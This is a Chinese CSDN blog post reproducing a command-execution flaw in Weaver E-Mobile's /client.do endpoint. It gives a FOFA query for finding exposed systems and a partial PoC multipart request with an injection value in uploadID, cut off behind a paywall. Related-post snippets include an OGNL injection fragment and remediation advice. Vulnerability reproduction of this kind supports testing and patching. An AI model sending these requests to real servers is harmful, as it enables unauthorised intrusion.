泛微E-Mobile /client.do 命令执行漏洞复现

已于 2024-04-06 14:47:34 修改
阅读量1.3k 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全 安全
于 2024-04-04 18:06:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/137379156
版权

0x01 产品简介

泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列功能和工具,使企业员工能够通过移动设备随时随地进行办公和协作。

0x02 漏洞概述

泛微E-Mobile存在命令执行漏洞,攻击者可以通过/client.do执行任意命令执行,从而获得服务器权限。

0x03 复现环境

FOFA:"Weaver E-Mobile"

0x04 漏洞复现

PoC

POST /client.do HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTm8YXcJeyKDClbU7

------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="method"
 
getupload
------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="uploadID"
 
1'
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
移动平台e-mobile漏洞利用
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 8341
移动平台e-mobile漏洞利用基本信息 漏洞情报编号:vulbox-intel-15244 是否可自动化组件:是 CVE-ID:暂无 发布日期:2022/04/01 15:48:45 CNNVD-ID:暂无 最新更新时间:2022/04/08 18:02:59 CNVD-ID:CNVD-2017-02376
E-Mobile 6.0存在命令执行漏洞
xiaokp7的博客
07-30 1508
E-Mobile 6.0爆出存在命令执行漏洞的问题。在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令执行,从而获得服务器的命令执行权限。
漏洞E-Mobile 6.0 client.do存在命令执行漏洞
qq_34780861的博客
04-14 726
E-Mobile 6.0爆出存在命令执行漏洞的问题。在已经确认了这个漏洞可以被攻击者利用,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令执行,从而获得服务器的命令执行权限。
移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 4318
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。e-mobile,由高端OA专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
ECOLOGY9 记一次E-MOBILE7登录页主题错乱的问题
东枫落定的专栏
06-05 295
ECOLOGY9 中E-MOBILE7的登录主题错乱
漏洞-EMobile存在弱口令漏洞
qq_34780861的博客
03-19 1637
-EMobile存在默认口令,攻击者可能通过尝试弱口令,非法进入系统,恶意操作或者收集信息进一步攻击利用。
最新漏洞汇总----实时更新!!!
yggcwhat
07-31 4106
最新漏洞汇总
移动平台e-mobile漏洞利用的修方案
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 5245
移动平台e-mobile漏洞利用的修方案1. 对产生漏洞模块的传入参数进行有效性检测,对传入的参数进行限定2. 当用户输入限定字符时,立刻转向自定义的错误页,不能使用服务器默认的错误输出方式 3. 对以上标签进行危险字符过滤,禁止('、"、+、%、&、、()、;、and、select等)特殊字符的传入 4. 加密数据库内存储信息 5. 与数据库链接并访问数据时,使用参数化查询方式进行链接访问
漏洞预警】E-mobile v9.5任意文件上传漏洞
做自己喜欢的事,并将其发挥到极致!
05-31 4532
E-mobile v9.5 存在任意文件上传漏洞
【1day】E-Mobile 6.0 存在命令执行漏洞
记录并分享学习安全的知识点..
07-21 1204
E-Mobile一款由上海网络科技股份有限公司开发的移动办公产品,专门为手机、平板电脑等移动终端用户打造的移动办公产品。E-Mobile 6.0 版本存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
漏洞e-Mobile 移动管理平台文件上传漏洞
qq_34780861的博客
04-25 1408
e-Mobile移动管理平台是一款由软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。e-Mobile 移动管理平台存在任意文件上传漏洞
E-Office10远程代码执行漏洞
05-06
E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
e-cology9 2303.01版安装包
06-09
之前在某网站付费购买的安装包分享给各位学习借鉴。
e-office短信插件_短信接口开发_e-office短信发送设置
02-11
e-office短信插件设置指南 在e-office V10.0版本中,设置短信发送功能需要通过短信接口进行开发。下面将详细介绍e-office短信插件的设置步骤和短信接口的开发过程。 一、e-office短信插件...
e-office_V10.0-短信设置说明.docx
09-29
e-office_V10.0-短信设置说明】 e-office是一款高效的企业办公自动化系统,旨在提升企业的协作效率和管理水平。在V10.0版本中,短信功能得到了进一步的强化,使得企业能够通过短信进行快速、便捷的信息...
漏洞OA E-Mobile 移动管理平台 lang2sql 任意文件上传漏洞
最新发布
凝聚力安全团队
06-19 1144
OA E-Mobile 移动管理平台 lang2sql 接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
移动管理平台E-mobile lang2sql接口存在任意文件上传
weixin_68647219的博客
11-07 571
E-mobile系统 lang2sql接口存在任意文件上传漏洞,由于后端源码中没有对文件没有校验,导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。2.资产测绘web.body="当前版本: 20190924"
E-Mobile 后台管理系统漏洞
热门推荐
L6y1a
02-20 1万+
转载:https://blog.csdn.net/qq_27446553/article/details/68203308 E-Mobile 后台管理系统漏洞 可以通过火狐hackbar插件进行验证 Poc : message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensym...
e-mobile 6.0远程命令执行漏洞
09-06
e-mobile 6.0远程命令执行漏洞是指e-mobile 6.0版本中存在的一种安全漏洞,攻击者可以利用该漏洞通过远程方式执行恶意命令,从而获取系统权限并对系统进行非法操作。 该漏洞的产生是因为e-mobile 6.0在接收用户输入时没有正确地过滤或验证输入的内容,导致攻击者可以通过构造恶意请求向系统发送包含恶意命令的数据,进而执行指定的操作。 攻击者可以通过利用该漏洞执行一系列恶意操作,如获取系统权限、窃取敏感信息、篡改系统配置和数据等。由于该漏洞的严重性,攻击者可以对系统进行任意操控,对目标系统造成严重的威胁和损害。 为了防止该漏洞的利用,用户和系统管理员可以采取以下防护措施: 1. 及时升级:建议用户及时升级e-mobile至最新版本,以确保系统安全性。 2. 配置安全策略:通过配置系统安全策略,限制远程访问权限,尽量减少攻击面。 3. 安全加固:加强服务器的安全配置,包括访问控制、强化密码策略、防火墙等措施。 4. 审计系统日志:定期审计系统日志,及时发异常活动,以便采取适当的应对措施。 5. 安全培训:提高员工的安全意识,加强信息安全培训,避免因人为操作造成漏洞被利用。 总之,对于e-mobile 6.0远程命令执行漏洞,用户和系统管理员应该保持警惕,及时采取相应的安全防护措施,以保护系统的安全和稳定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值